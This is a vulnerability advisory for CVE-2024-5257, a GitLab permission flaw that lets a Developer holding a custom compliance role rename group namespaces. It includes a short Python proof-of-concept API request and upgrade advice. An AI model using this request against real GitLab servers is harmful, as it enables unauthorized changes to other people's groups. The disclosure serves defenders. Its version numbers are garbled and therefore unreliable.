CVE-2024-5257 - Developer Users with `admin_compliance_framework` Custom Role Can Modify Group Namespace URLs in GitLab CE/EE (17. - 17..4, 17.1 - 17.1.2)
An issue with GitLab CE/EE (Community Edition/Enterprise Edition) has been identified where users with certain permissions can perform unauthorized operations. This vulnerability has been assigned the CVE identifier CVE-2024-5257.
Vulnerability Details
An issue was discovered in GitLab CE/EE where a Developer user with a custom role that includes the admin_compliance_framework permission may have been able to modify the URL for a group namespace. This issue arises from incorrect permission checks and impacts data integrity and potentially exposes sensitive information to unauthorized individuals.
Exploit Example
To demonstrate this exploit, consider a Developer user Alice with a custom role that has the admin_compliance_framework permission. If they are assigned to a project under the group namespace example-group, their permissions should not allow them to modify the URL of the group, but due to this vulnerability, they can.
Here is a code snippet showcasing the exploit
import requests
# GitLab instance URL and user access token
gitlab_url = "https://gitlab.example.com";
user_token = "Alice_user_token"
# Group ID where the URL should not be modified
group_id = "example-group"
# Attempt to modify the group URL
headers = {
"Private-Token": user_token,
"Content-Type": "application/json",
}
new_name = "modified-example-group"
data = {
"path": new_name,
}
response = requests.put(f"{gitlab_url}/api/v4/groups/{group_id}", headers=headers, json=data)
print(response.status_code)
Under normal circumstances, the API request would return a 403 Forbidden status code, indicating that the user does not have permission to modify the group URL. However, when exploiting the CVE-2024-5257 vulnerability, the response will be a 200 OK status code, indicating that the operation was successful and the group URL is now modified.
This issue was first reported in the GitLab issue tracker
For more details, please refer to the issue on the official GitLab website
- GitLab Issue #14053: Incorrect permission check for the namespace admin
GitLab has provided patches for the affected versions mentioned above
- Upgrading to GitLab 17..4 (Release Notes)
- Upgrading to GitLab 17.1.2 (Release Notes)
Users are advised to upgrade their GitLab CE/EE installations to the respective patched versions immediately to address this vulnerability.
Timeline
Published on: 07/11/2024 07:15:04 UTC
Last modified on: 07/12/2024 16:54:34 UTC